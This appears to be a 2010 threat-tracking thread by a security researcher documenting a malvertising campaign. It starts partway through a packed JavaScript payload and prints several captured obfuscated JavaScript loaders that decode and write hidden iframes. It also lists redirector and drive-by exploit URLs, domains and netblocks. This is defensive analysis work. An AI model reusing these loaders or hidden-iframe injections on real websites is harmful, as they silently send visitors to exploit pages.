|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|14278a4166c9380ac458311916360d320202bb86b930868de0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1471971cdf196c8d51926ae031d1e0e34408e81aa42311926ae031d1e0e34408e81aa42311926ae031d1e0e34408e82e01ebe13b5b8921e59ff0c262410dad1c80197aa509dbe6215669ff17a560e2d1f91900625f80d2722717a560e039bb3c00625f825ae78e0e13cb21258e1404e379f10fe89712c00862dc720527c717d02c034f1470e7d06ecd6c1d6e1030d27227197cbeb0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1472b22812298e48c1abe7fc1c31a481b8dd2524ae18d243aa620eaad043228f2b12c008633e1bc207989712cfa53c1aef996244ecc4004e3291971cdf1dc7bc427b39b72428cd33120e0c0a4ccea0b6abce07781090e5ea6a113ccd41b8b2753056d4b2f823b31418a04276339c34708480723be72e071d33103e701bb42351191e681bf36e21ba9ced11cc9ee2fb918b1db51eb15c7ea72d0cd8413178ce08b7e312efa6e928d72fb1fe79532aabf0814bf52e039357c34408e817f76b20f0fc26156a41018b7aac07b87481f9389c034249a0651f4a0221107042916b26e5abc1aa08a70104be22b2804008c51d217f6eaf2ef39b507c89d621041a700a07af24d338c0c618e123333eb1eaf87c0c9208524d564b200c89720ca440299b66519b25fc2a43a6021aa5ca2bf802405076a109f4cb11205da01e1443e0a03dcb2a3e93d1fc5db5271ccf9139dc3d28188b509fcf13127045b1a75ea029a682e1fd7ae906d11191075ecd28d72fb0e0ead72cf1040037ad36149210d2216a20351d2a01fd00c00210f432d9526533aaed8318bbad250603f105cc50023fef533fc80f2f13b5a2bd059c2bdac3d27a2d5d0f81d15047a6f40a96fe62c17b38250603f048cb38155aa5420e72c1306b9af104c3fe1cb244b1c5b357296b80e126c9e90a3d4bf1d441f21b735cd2f503d60728f5d26560f01d6d73a281d73c2761a8b160ebd50c1b0b701e29692953b551afbffc28c8c71338fdbb1e9d32b032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0159d30830a91b90b6b4a9003e5382da7583252207b0a739100154a0f0ab92322c7d80504ef3430c7559401824f909a5b53089b47c0f839fe10a67e50cca16601b98b40f682d12ca3b7a32dd3e92b18a2e21af0391dc410c07a89c2330ae0a1f859e30ecd77d039357c17c06041e223e224c88df16ebeec01f36c21832aca1a1bf831c750f83243dab10224cc1213b192af495002b3dd832b5c500eb558017d0901265d6a42bf802420e72c120b05220d0e7d01c9f39f1e33b392b2bc4b197d4b433dfa9a2ac25092be16141610f3518026cf16f9a32136829f2ee53d129b255f20de0c30141d0c2e6100a234293d16a743a22a72a92f171c331d29f91e33b3912d66721bc1c621d4e6b909510b233592100709a1d19e1a2a0659cd72200785349135f317b72a113a30829a682e084b0af24eb2261aec0c125b2b5909c6c6404ba64a0c864b312c5e1b18165871081ac90cfb6380c640d82c2c39f2392b342d20f892420fe2217c9a306298f114ce3960d3c68d01f175f2f558592a6c7c226e045321252ec05124cd2d3783620d9f461ec13152779a4a1c7680f222522901f175f1fe6684191bb5a296b80e0abb7f423d8c4c09e812d112f6ca2ebea001a117e413d302c1b3e3c41fd00c02be03ee127e0d2020c8430a53352137d7b21f55e2b347c220152ff8613774d6032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0205d17822d15782bc2b9907d51d603aeb8820823ec2c8aafa2948ca918a700b0c859be096c52804263a32e20d2804012ab06a124908afab7299a8ba2ea0ec91e2528d115dcd107f9c7f33b6cc801f175f172f5ce12cfabc040c00e04ad1711d2a69b12a53152f34e2d281d73c1ec4bb00f5d6ba2d982a41bbb17621659d81c5b3571d88ad931954b71add61e1cea70a06591061c0c8821cf8ea2010d47d23db96b21424b4210dda62e4dbf106cc8b51fc5db502ba6f82b7d5b21aaa55f1cfeb090ac92603111ffd2eb7cd217abdb32be03ee044c1a6018269021c777f2123c2022e2f411e6a3a923ed37220002801792714306b9af0d0e7d01c9f39f1e33b3934941e00a53352137d7b21f55e2b347c2202421be3|Math|floor|break|splice|29819039|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|55721041|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
This causes two hidden iframes. The first to the trendanalytics2010.co.cc leads you to the drive by, the second just keeps stats/tabs on clients hitting the malvertising domains:
<iframe width="1" height="1" style="visibility: hidden;" src="http://trendanalytics2010.co.cc/colombo.php?n=cust1">
<iframe width="1" height="1" style="visibility: hidden;" src="http://js.zedo.com.rc1.hiskweb.com/stats_js_e.php?id=223417424">
**EDIT**
I uploaded the sample I posted to JSUnpack and it validates it. The report is as below:
http://jsunpack.jeek.org/dec/go?report=8442c03b07e2de6a49068fb3e5b1d1ae9bf7e3fa
-
Drive By:
http://hkuos.com/vd/ncdka.php - Yesterday
http://polkj.com/ch/jqpqzlq.php - Today
Redirectors:
http://ailerry.co.cc/kleopatra.php?n=cust12 - Yesterday
http://almodial.co.cc/gtrsp.php?n=cust12 - Today
-
Drive By:
http://qxitr.com/fv/_hsj.php
Redirectors:
http://chelleak.co.cc/gtrsp.php?n=cust12
-
Seeing some stuff move into a new netblock recently:
89.248.174.0/23
Malvertising servers:
view.atdmt.com.risoton.com - jsunpack report here (http://jsunpack.jeek.org/dec/go?report=be928c863aaeb55d18563f9016300d3d2dfe9fa9)
view.ads.cheratic.com
view.atdmt.com.tessane.com
Redirector:
http://benzele.co.cc/jakomo.php?n=cust1
The driveby/exploit domains remain within the 194.8.250.0/24 netblock.
-
More domains active in the malvertising netblock:
media.fastclick.net.timoton.com
Haven't seen the hidden iframes inside of this obfuscated javascript, it will probably be switched on at later date given the netblock it lives in. Also MSN/Live.com are currently using this advertising service.
**EDIT**
And its already swapped over to redirecting to drivebys:
http://jsunpack.jeek.org/dec/go?report=8f1e9fa5b9651e1fdb135997cd15f0d8ec42a014
http://mildron.co.cc/jiqasdir.php?n=cust11
http://jgtee.com/ww/wnuajoz.php
-
URL's are changing up slightly today:
http://statpc.in/x/?src=sftmaster2&id=av1&o=o
Net has moved for the drive by's as well, to another already known bad actor:
91.188.59.55
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55
Differnt driveby style site as well, this is more of a scanner page.
-
http://tosoft.in/x/?src=sftmaster2&id=av5&o=o
http://resolvenews.in/x/?src=sftmaster2&id=av5&o=o
-
facilitatedigital.net
For the last day or so people logging into mail.live.com, menshealth.com and a bunch of others have been getting malvertising redirecting them to drive by sites. However, they have been flipping the switch on and off for redirecting to the drive bys.
Example URL that serves up obfuscated javascript that does not contain the drive by:
http://facilitatedigital.net/rc/js/ld/?fn=11a&sid=1112535&dpn=75zh1&fp=n&ctp=y9i12
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Thu, 05 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 1087
var MPvpZm=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var GsZiFN=thi
s;var kkMsoVj=GsZiFN [MPvpZm];var oxdh=new String('unescape');var ugoi=GsZiFN [ox
dh];var HIhVN='6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q9
6Jk6aM6aa6ak6nn6/n6J_6a96JM6Qa6Jk6JJ6nR6aQ6JM6Q/6Q/6Q96ak6nn6/_6ak6na6/J6ak6na6/J
6QQ6QQ6QQ6a16JJ6JG6JU6JQ6JM6Q/6J16Jk6Q/6QQ6JA6Qa6Jl6a16Jn6JA6JR6ak6na6/J6aQ6a96Q/
6J_6Qa6JQ6Jk6Q/6nR6aQ6kA6Ja6JG6J_6J16Jl6aQ6ak6nn6/k6ak6nn6/n6JU6JR6JQ6a96Qn6Qa6Jn
6nR6aQ6JM6Q/6Q/6Q96nP6aA6aA6JJ6J_6Jn6JU6JG6JU6Q/6J_6Q/6Jk6J/6JU6JQ6JU6Q/6J_6JG6a1
6J16Jk6Q/6aA6Ja6J/6Ja6aA6/J6JG6JU6JQ6JM6Q/6/16Jk6Q/6aA6n_6nJ6n96QM6nJ6n96n96kA6n9
6n/6a16JP6Q96JQ6aQ6a96Ja6JA6Qa6J/6Jk6Qa6nR6aQ6n96aQ6a96ak6nn6/k6ak6nn6/n6aA6J_6ak
6nn6/k6aa6aU6aU6nl69P69P69P';var _Mge='WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JH
MdKUk5PB:8Ai/luIop%CS1benrhqg';var XOy='F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-D
ysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN';var cYS='';var _eTy;var irIk;for(_eTy=0;_eTy<HIhV
N.length;_eTy++){ irIk=XOy.indexOf(HIhVN.charAt(_eTy));if(irIk>-1){ cYS+=_Mge.cha
rAt(irIk);}}kkMsoVj(ugoi(cYS));
Then some of the adverising servers in the same netblock (media.topsann.com) will *sometimes* serve up the obfuscated javascsript that redirects to the drive by:
JSUnpack report: http://jsunpack.jeek.org/dec/go?report=812b87a1ed2c803ceb6b81671f99107280d2d241
URL: http://media.topsann.com/ad/js/ld/?chn=22a&bfx=16tz516&sid=176552&zed=81963&fl=no&rtr=y
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Fri, 06 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3652
var bibak=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var Thhx=this;v
ar EDTmvV=Thhx [bibak];var sxMKjk=new String('unescape');var Uzym=Thhx [sxMKjk];v
ar Hz_c='TjBTZ8TZsTX=TZsTX/TX8TZsTXUTXyTvjT8UTvjTvATXcTXWTZZTvjTssTX=TZsTXWTvATXc
TXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvy
TvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvjTvUTvjTXcTXWTZZTvjTssTX=TZsTXWTvA
TXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXy
TW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZs
TXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTZ8TZWTXvTZ8TZsTZvTX/TXcTXZTvAT8jTvyTvjTXc
TXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/
TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXp
TsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTXyTX=TZ8TZsTs/TXcTXsTXWTZATspTXXTvATvvTvjTvv
Tv/TvUT8=Tv/Tv/Tv/TvjTvpTvjTvAT8=T8jT8jT8jTvjTvBTvjT8XT8jTvjTvBTvjT8XT8jTv/T8nTjB
TjBTZXTX=TZvTvjTX=TXyTXyTWpTZsTvjT8UTvjTvvTvvT8nTjBTZXTX=TZvTvjTXUTZsTX8TXATvjT8U
TvjTX=TXyTXyTWpTZsTvcTXUTX=TZsTX8TXATvATZ8TZsTX=TZsTX/TX8TZsTXUTXyTv/T8nTjBTjBTjB
TjBTX/TXXTvjTvATvjTXUTZsTX8TXATvjTv=T8UTvjTXcTZWTXyTXyTvjTv/TvjTZnTjBTXsTXpTX8TZW
TXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZv
TX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=
TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTZsTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8W
T8vTvXTZ8T8UT8jTvXTXWT8UT8=TvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZs
TZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8jTvZTvjTXATXWTX/TXZTXATZs
T8UTvZT8jTvZTvjTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjB
TZUTvjTvjTXWTXyTZ8TXWTvjTvjTZnTjBTjBTj/Tj/TjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/
TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8U
TvZTXATZsTZsTZjT8BTvpTvpTXUTXWTZ8TXpTXUTXpTZsTvcTX8TXpTvcTX8TX8TvpTZvTX8TZvTXsTX8
TZATvcTZjTXATZjT8pTXZTXBT8UTX8TZWTZ8TZsT8=T8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTvjTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8
TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTXBTZ8TWp
TXWTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTjBTjBTjBTZUTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXc
TXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX=TvjTXATZvTXWTXXT8UTvZTXATZsTZsTZjTvWT88Ts=TvW
T8vTsXTvWT8vTsXTZZTZZTZZTvcTXvTX/TXZTX8TXpTXUTXUTXWTZvTX8TXWTvcTX8TXpTXUTvWT8vTsX
TvWT88TsXTXATZvTXWTXXTvWT88TssT8ZTXsTXUTvUT8=TvZTvjTZsTX=TZvTXZTXWTZsT8UTvZTWpTXv
TXyTX=TXcTXnTvZTvWT88TsWTvWT88Ts8TX/TXUTXZTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTXvTXsTXvTvpTX=TsvTX/TXZTs8
TXpTXUTXUTXWTZvTX8TXWTvpT8ZT8vT8ATZAT8/T8jTZ8TZsTX=TZsTvcTXZTX/TXXTvZTvjTXvTXpTZv
TXsTXWTZvT8UTvZT8jTvZTvjTvWT88TsWTvWT88Ts8TvpTX=TvWT88TsWTvvTv/Tv/T8nTjBTjBTjB';v
ar DpdNZ='mEeYnB0osA1-6SC:raMQ=XFyK/5&PpD_I2xLH3OZjqJwb4dV9RWfgv.l7ktiuzhNc%T?G8U
';var t_H='3caPmnjI6B=JX0yOVCS-9op5u_Wf1iUY.v2%K8MxlE7hDs:?/wQ4LtHqZFGd&NbReTkgzA
r';var rSE='';var Jnox;var t_dIH;for(Jnox=0;Jnox<Hz_c.length;Jnox++){ t_dIH=t_H.i
ndexOf(Hz_c.charAt(Jnox));if(t_dIH>-1){ rSE+=DpdNZ.charAt(t_dIH);}}EDTmvV(Uzym(rS
E));
This causes a hidden iframe to be written that causes the client to hit a redirect to a driveby:
<iframe src='http://mesomot.co.cc/rcrdcx.php?gj=cust12' style='visibility:hidden;' width='1' height='1' ></iframe><iframe src='http://media.topsann.com/stats_js_e.php?id=176552' style='visibility:hidden;' width='1' height='1' ></iframe>
The co.cc domain redirects then to the actual driveby located here:
http://uyyty.com/qu/sjmba.php
This drive by is again single shot and subsequent visits to it will not serve up exploits, it will usually just redirect to google.com.